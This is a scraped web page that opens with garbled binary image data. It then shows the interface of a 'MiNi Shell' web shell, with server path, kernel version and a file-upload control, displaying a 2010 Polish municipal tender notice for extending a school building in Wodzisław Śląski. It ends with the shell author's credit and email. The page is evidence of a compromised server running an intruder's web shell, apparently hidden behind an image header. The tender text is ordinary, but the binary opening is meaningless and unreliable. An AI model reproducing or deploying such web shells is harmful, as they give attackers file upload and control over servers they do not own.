JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/211742-N-2010.html

<p class="kh_header"><b>Wodzisław Śląski: Rozbudowa budynku Szkolno-Przedszkolnego nr 3 wraz z zagospodarowaniem terenu szkolnego w Wodzisławiu Śl. w dzielnicy Radlin</b><br>
<b>Numer ogłoszenia: 211742 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Wodzisław Śląski , ul. Bogumińska 4, 44-300 Wodzisław Śląski, woj. śląskie, tel. 032 4590431, faks 032 4552463.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodzislaw-slaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku Szkolno-Przedszkolnego nr 3 wraz z zagospodarowaniem terenu szkolnego w Wodzisławiu Śl. w dzielnicy Radlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia  obejmuje : Wykonanie robót budowlanych, Wykonanie  pełnej  dokumentacji powykonawczej  wraz z inwentaryzacją geodezyjną powykonawczą oraz czynności niezbędnych   w celu uzyskania pozwolenia na użytkowanie, Wykonanie innych robót, usług niezbędnych do prawidłowego zrealizowania przedmiotu zamówienia , Wykonanie i montaż tablicy informacyjnej o realizacji zadania z blachy ocynkowanej  o gr.0,75 mm oklejonej wydrukiem wielkoformatowym + konstrukcja stalowa wykonana    z profili zamkniętych( powyżej 2,0 m od podłoża) wraz z robotami towarzyszącymi - 1 szt  o wymiarach 200 cm x 125 cm zgodnie z wzorem, który Zamawiający przekaże  wykonawcy  wyłonionemu w niniejszym przetargu, Zlecenie wymaganych nadzorów branżowych, Opracowanie świadectwa charakterystyki energetycznej zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia 06 listopada 2008r. w sprawie metodologii obliczania  charakterystyki energetycznej budynku i lokalu mieszkalnego lub części budynku stanowiącej samodzielną całość techniczno-użytkową oraz sposobu sporządzania i wzorów świadectw i ich charakterystyki energetycznej ( Dz.U. 201/2008 poz.1240 ).
Roboty budowlane obejmują dwa zadania w następującym zakresie: zadanie 1 - roboty wykończeniowe w pomieszczeniach powstałych na ostatniej kondygnacji segmentu A, roboty rozbiórkowo-remontowe budynku szkoły, instalacje wewnętrzne, przyłącze kanalizacji deszczowej, zagospodarowanie terenu wokół szkoły. Zadanie 2 - termomodernizacja budynku.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca:wykaże się realizacją robót o podobnym zakresie tj. wykaże realizację  zamówień porównywalnych  z  przedmiotem zamówienia w okresie ostatnich 5 lat - roboty związane z   budową lub przebudową budynku  użyteczności publicznej  o wartości min. 2 mln zł brutto. Za wykonanie  zamówienia odpowiadającego swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia Zamawiający uważać będzie wykonanie  co najmniej 2  zamówień  obejmujących  łącznie  niżej  wymienione rodzaje robót budowanych: a. ogólne roboty   remontowo -budowlane, b. roboty  instalacyjne w zakresie   wew. instalacji wod.-kan., wentylacji, centralnego ogrzewania, elektrycznej, roboty związane z infrastrukturą techniczną i zagospodarowaniem terenu. Wykaże realizację  co najmniej 2 zamówień  w okresie 5 lat obejmujących roboty związane z dociepleniem budynków o wartości min. 300 tys. zł brutto. W przypadku zrealizowania  przez Wykonawcę docieplania łącznie  z robotami  określonymi w pierwszym myślniku, Zamawiający  zaliczy  wykonanie  docieplenia , jednak wówczas wartość zamówienia zwiększa się  do min.2,3 mln zł . Wykaże realizację co najmniej 1 zamówienia  obejmującego  wykonanie boiska o nawierzchni trawiastej  o wartości  min.200 tyś. zł brutto, wykaże realizację co najmniej dwóch usług w zakresie  opracowania świadectw charakterystyki  energetycznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca: 	
wykaże dysponowanie osobami z uprawnieniami i przynależnością do Polskiej Izby Inżynierów Budownictwa w zakresie niezbędnym do wykonania zamówienia i pełniących następujące funkcje:
 Kierownik budowy . Minimalne wymagania :
- uprawnienia budowlane w specjalności  konstrukcyjno-budowlanej ,
-  przynależność do  Polskiej Izby Inżynierów Budownictwa,
- 5 letni staż pracy  zawodowej  licząc od od daty wydania uprawnień      budowlanych do dnia upływu skradania oferty,
- oświadczenie o kierowaniu robotami budowlanymi  związanymi                    z       realizacją  co najmniej 2   budynków , w tym 1  użyteczności  publicznej,   

Kierownik robót sanitarnych.  Minimalne wymagania :
- uprawnienia budowlane w specjalności instalacyjnej w zakresie  sieci,         instalacji  i urządzeń  cieplnych, wentylacyjnych  wodociągowych                      i kanalizacyjnych,
- przynależność do  Polskiej Izby Inżynierów Budownictwa
-  oświadczenie o kierowaniu robotami  związanymi z  realizacją  co najmniej           2   budynków    
Kierownik robot elektrycznych i elektroenergetycznych. Minimalne     wymagania 
- uprawnienia budowlane w specjalności instalacyjnej w zakresie  sieci,         instalacji  i urządzeń elektrycznych i elektroenergetycznych,  
- przynależność do  Polskiej Izby Inżynierów Budownictwa,
- oświadczenie o kierowaniu robotami  związanymi   z  realizacją  co najmniej        2  budynków  ,  
 Kierownik robót drogowych. Minimalne wymagania :
- uprawnienia budowlane z specjalności drogowej,  
- przynależność do  Polskiej Izby Inżynierów Budownictwa,

osoba posiadająca uprawnienia  w zakresie sporządzenia świadectw charakterystyki energetycznej w rozumieniu  art.5  ust.8 ustawy z dnia          07 lipca 2004 r. Prawo budowlane ( Dz.U. Z 2006 Nr 156 poz 118 z póź. zmianami).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany treści zawartej umowy możliwe są jedynie w trybie art. 144 ustawy Prawo zamówień  publicznych i mogą nastąpić tylko na piśmie w formie aneksu pod rygorem nieważności.1.1. Zmiana treści umowy w zakresie  zmiany   terminu realizacji przedmiotu zamówienia  lub przesunięcia terminu odbioru robót, możliwa jest w przypadku  : a)wystąpienia niekorzystnych warunków atmosferycznych mających wpływ na prawidłowe prowadzenie robót budowlano - montażowych, lub uniemożliwiających ich prowadzenie (zapisane w dzienniku budowy) - przedłużenie terminu realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót, b)konieczności zmiany dokumentacji projektowej wynikłej w trakcie realizacji inwestycji -  zmiana terminu realizacji zamówienia o tyle dni, ile trwało przeprojektowanie, c)zmiany producenta materiałów/urządzeń, wycofania materiałów/ urządzeń z użycia - zmiana terminu   wykonania   zamówienia  o czas potrzebny na zakup nowych materiałów urządzeń,
d)wystąpienia zdarzeń losowych - klęska żywiołowa - zmiana termin wykonania zamówienia o tyle dni, ile trwało wstrzymanie robót, e)konieczności wykonania robót dodatkowych zgodnie z art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, opóźniających lub wstrzymujących realizację robót zasadniczych (termin wykonania zamówienia może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu wykonywania robót zasadniczych z tego powodu), f)wykonania robót przewidzianych w dokumentacji technicznej opisującej przedmiot zamówienia, jednak nie wykazanych w przedmiarze i nie ujętych w kosztorysie ofertowym, g)zmiany  ilościowej i wartościowej pozycji kosztorysowych, h)pozyskania środków zewnętrznych  na przedmiotową inwestycję ( możliwość skrócenia terminu). 
1.2. Zmiana treści zawartej umowy w zakresie zmiany wynagrodzenia  w sytuacji gdy:
a) zajdzie konieczność wykonania robót, które  zostały pominięte przez projektanta (w przedmiarze robót bądź w projekcie  budowlano-wykonawczym) a których wykonanie jest niezbędne do prawidłowej realizacji przedmiotowego zamówienia, b) wystąpią roboty zamienne spowodowane względami atmosferycznymi, gruntowo- wodnymi, błędami w dokumentacji  technicznej, wycofaniem materiałów urządzeń i zastosowanie  nowych  materiałów pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy oraz innymi   niemożliwymi   do przewidzenia na  etapie podpisania  umowy, c)zajdzie konieczność zmiany technologii wykonania  z uwagi na konieczność zastosowania innych rozwiązań technicznych i materiałowych ze względu na zmiany obowiązującego prawa oraz w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, d) nastąpi zmiana obowiązującej stawki  VAT , e)zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna skutkująca niemożliwością wykonania lub  należytego wykonania  umowy  zgodnie z SIWZ.    
1.3. W  razie  wystąpienia   powyższych   przesłanek,  Wykonawca   jest zobowiązany  do ich udokumentowania w sposób nie budzący zastrzeżeń (protokół konieczności, notatkę - powyższe dokumenty muszą być zaakceptowane przez projektanta) i przedłożone Zamawiającemu do zatwierdzania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodzislaw-slaski.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta 
Wydział Inwestycji Miejskich
ul. Bogumińska 4
44-300 Wodzisław Śl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2010 godzina 10:30, miejsce: Urząd Miasta Wodzisławia Śl.
ul. Bogumińska 4
44-300 Wodzisław Śl.
Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com